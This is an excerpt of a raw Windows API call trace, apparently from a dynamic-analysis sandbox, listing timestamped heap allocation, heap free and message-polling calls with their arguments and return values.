0x1796e28 [0132.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0132.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0132.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0132.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0132.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0132.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0132.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0132.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0132.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0132.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0132.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0132.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0132.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0132.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0132.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0132.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0132.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0132.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0132.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0132.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0132.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0132.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0132.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0132.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0132.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0132.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0132.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0132.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0132.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0132.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0132.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0132.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0132.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0132.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0132.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0132.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0132.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0132.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0132.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0132.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0132.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0132.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0132.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0132.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0132.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0132.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0132.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0132.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0132.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0132.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0132.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0132.136] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0132.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0132.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0132.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0132.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0132.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0132.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0132.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0132.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea040 [0132.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0132.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0132.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0132.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0132.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0132.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0132.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0132.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0132.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0132.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0132.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0132.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0132.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0132.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea268 [0132.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0132.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea268 | out: hHeap=0x1780000) returned 1 [0132.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0132.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0132.137] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0132.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0132.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0132.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0132.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0132.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0132.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0132.138] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0132.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0132.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0132.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0132.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0132.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0132.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0132.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0132.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0132.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0132.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0132.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0132.187] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0132.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0132.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0132.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0132.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0132.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797048 [0132.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0132.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0132.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0132.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0132.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0132.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0132.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0132.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0132.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0132.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0132.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0132.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0132.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0132.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0132.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0132.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0132.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0132.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0132.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0132.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0132.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0132.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0132.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0132.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0132.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0132.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0132.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0132.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0132.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0132.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0132.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0132.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0132.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0132.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0132.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0132.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0132.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0132.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0132.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0132.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0132.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0132.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0132.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0132.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0132.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0132.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0132.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0132.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0132.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0132.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0132.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0132.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0132.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0132.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0132.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0132.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0132.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0132.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0132.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0132.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0132.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0132.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0132.190] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0132.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0132.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8ab0 [0132.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0132.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8ab0 | out: hHeap=0x1780000) returned 1 [0132.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0132.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0132.190] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0132.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0132.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0132.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0132.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0132.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0132.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0132.190] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0132.190] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0132.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0132.190] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0132.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0132.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0132.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0132.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0132.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0132.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0132.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0132.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0132.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0132.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0132.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0132.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0132.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0132.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0132.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0132.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0132.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0132.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0132.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0132.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0132.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0132.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0132.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0132.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0132.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0132.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0132.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0132.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0132.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0132.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0132.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0132.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0132.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0132.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0132.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0132.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0132.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0132.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0132.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0132.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0132.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0132.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0132.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0132.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0132.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0132.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0132.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0132.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0132.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0132.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0132.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0132.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0132.192] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, 